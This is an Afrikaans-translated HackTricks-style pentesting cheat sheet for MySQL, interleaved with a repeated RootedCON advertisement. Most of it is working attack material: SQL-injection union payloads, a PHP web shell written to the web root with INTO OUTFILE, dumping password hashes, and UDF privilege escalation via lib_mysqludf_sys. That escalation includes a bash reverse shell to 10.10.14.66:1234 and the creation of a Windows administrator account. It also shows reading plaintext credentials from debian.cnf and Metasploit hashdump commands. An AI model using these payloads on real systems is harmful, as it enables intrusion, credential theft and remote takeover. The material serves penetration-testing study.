RootedCON is die mees relevante sibersekerheidgebeurtenis in Spanje en een van die belangrikste in Europa. Met die missie om tegniese kennis te bevorder, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekerheidspesialiste in elke dissipline.
MySQL kan beskryf word as 'n oopbron Relasionele Databasisbestuurstelsel (RDBMS) wat gratis beskikbaar is. Dit werk met die Gestruktureerde Vraagtaal (SQL), wat die bestuur en manipulasie van databasisse moontlik maak.
Verstekpoort: 3306
3306/tcp open mysql
Koppel
Plaaslike
mysql-uroot# Connect to root without passwordmysql-uroot-p# A password will be asked (check someone)
showdatabases;use<database>;connect<database>;showtables;describe<table_name>;showcolumnsfrom<table>;select version(); #versionselect @@version(); #versionselect user(); #Userselect database(); #database name#Get a shell with the mysql client user\!sh#Basic MySQLiUnionSelect1,2,3,4,group_concat(0x7c,table_name,0x7C) frominformation_schema.tablesUnionSelect1,2,3,4,column_namefrominformation_schema.columnswheretable_name="<TABLE NAME>"#Read & Write## Yo need FILE privilege to read & write to files.select load_file('/var/lib/mysql-files/key.txt'); #Read fileselect 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'#Try to change MySQL root passwordUPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';FLUSH PRIVILEGES;quit;
mysql-uusername-p<manycommands.sql#A file with all the commands you want to executemysql-uroot-h127.0.0.1-e'show databases;'
MySQL Toestemmingsopsomming
#MysqlSHOW GRANTS [FOR user];SHOW GRANTS;SHOW GRANTS FOR'root'@'localhost';SHOW GRANTS FORCURRENT_USER();# Get users, permissions & hashesSELECT*FROM mysql.user;#From DBselect*from mysql.user where user='root';## Get users with file_privselect user,file_priv from mysql.user where file_priv='Y';## Get users with Super_privselect user,Super_priv from mysql.user where Super_priv='Y';# List functionsSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION';#@ Functions notfrom sys. dbSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION'AND routine_schema!='sys';
Eintlik, wanneer jy probeer om data lokaal in 'n tabel te laai die inhoud van 'n lêer die MySQL of MariaDB-bediener vra die klient om dit te lees en stuur die inhoud. Dan, as jy 'n mysql-klient kan manipuleer om met jou eie MySQL-bediener te verbind, kan jy willekeurige lêers lees.
Let asseblief daarop dat dit die gedrag is wat gebruik word:
(Observasie van die "plaaslike" woord)
Want sonder die "plaaslike" kan jy kry:
mysql>loaddatainfile"/etc/passwd"intotabletestFIELDSTERMINATEDBY'\n';ERROR1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
RootedCON is die mees relevante kuberveiligheidgebeurtenis in Spanje en een van die belangrikste in Europa. Met die missie om tegniese kennis te bevorder, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidsprofessionals in elke dissipline.
In die konfigurasie van MySQL-diens, word verskeie instellings gebruik om sy werking en sekuriteitsmaatreëls te definieer:
Die user instelling word gebruik om die gebruiker aan te dui waarvolgens die MySQL-diens uitgevoer sal word.
password word toegepas om die wagwoord wat met die MySQL-gebruiker geassosieer word, te vestig.
admin_address spesifiseer die IP-adres wat luister vir TCP/IP-verbindings op die administratiewe netwerkinterface.
Die debug veranderlike dui op die huidige foutopsporingskonfigurasies, insluitend sensitiewe inligting binne logboeke.
sql_warnings bestuur of inligtingstreke gegenereer word vir enkelry-invoegingsopdragte wanneer waarskuwings na vore kom, wat sensitiewe data binne logboeke bevat.
Met secure_file_priv word die omvang van data-invoer- en -uitvoeroperasies beperk om sekuriteit te verbeter.
Voorreg-opskaling
# Get current user (an all users) privileges and hashesusemysql;select user();select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;# Get users, permissions & credsSELECT*FROMmysql.user;mysql-uroot--password=<PASSWORD>-e"SELECT * FROM mysql.user;"# Create user and give privilegescreateusertestidentifiedby'test';grantSELECT,CREATE,DROP,UPDATE,DELETE,INSERTon*.*tomysqlidentifiedby'mysql'WITHGRANTOPTION;# Get a shell (with your permissions, usefull for sudo/suid privesc)\!sh
Voorregskaping via biblioteek
Indien die mysql-bediener as root uitgevoer word (of 'n ander meer bevoorregte gebruiker) kan jy dit dwing om opdragte uit te voer. Hiervoor moet jy gebruiker-gedefinieerde funksies gebruik. En om 'n gebruiker-gedefinieerde te skep, sal jy 'n biblioteek vir die bedryfstelsel wat mysql uitvoer, benodig.
Die skadelike biblioteek wat gebruik kan word, kan binne sqlmap en binne metasploit gevind word deur locate "*lib_mysqludf_sys*" te doen. Die .so lêers is linux biblioteke en die .dll is die Windows een, kies die een wat jy benodig.
As jy nie daardie biblioteke het nie, kan jy hulle of soek, of hierdie linux C-kode aflaai en dit binne die kwesbare linux-masjien saamstel:
Nou dat jy die biblioteek het, teken binne in die Mysql as 'n bevoorregte gebruiker (root?) en volg die volgende stappe:
Linux
# Use a databaseuse mysql;# Create a tabletoload the library andmove it to the plugins dircreatetablenpn(line blob);# Load the binary library inside the table## You might need to change the pathandfilenameinsert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));# Get the plugin_dir pathshow variables like'%plugin%';# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/# dumpin there the libraryselect*from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';# Create a functiontoexecute commandscreatefunctionsys_execreturnsinteger soname 'lib_mysqludf_sys.so';# Execute commandsselect sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
Windows
# CHech the linux comments for more indicationsUSE mysql;CREATETABLEnpn(line blob);INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));show variables like'%plugin%';SELECT*FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';CREATEFUNCTIONsys_execRETURNSinteger SONAME 'lib_mysqludf_sys_32.dll';SELECT sys_exec("net user npn npn12345678 /add");SELECT sys_exec("net localgroup Administrators npn /add");
Uithaling van MySQL-verifikasie-inligting uit lêers
Binne /etc/mysql/debian.cnf kan jy die plat-teks wagwoord van die gebruiker debian-sys-maint vind
cat/etc/mysql/debian.cnf
Jy kan hierdie geloofsbriewe gebruik om in die mysql-databasis in te teken.
Binne die lêer: /var/lib/mysql/mysql/user.MYD kan jy al die hasse van die MySQL-gebruikers vind (diegene wat jy kan onttrek uit mysql.user binne die databasis).
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
https://book.hacktricks.xyz/pentesting/pentesting-mysql
Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
RootedCON is die mees relevante kubersekuriteit geleentheid in Spanje en een van die belangrikste in Europa. Met die missie om tegniese kennis te bevorder, is hierdie kongres 'n kookpunt vir tegnologie en kubersekuriteit professionele in elke dissipline.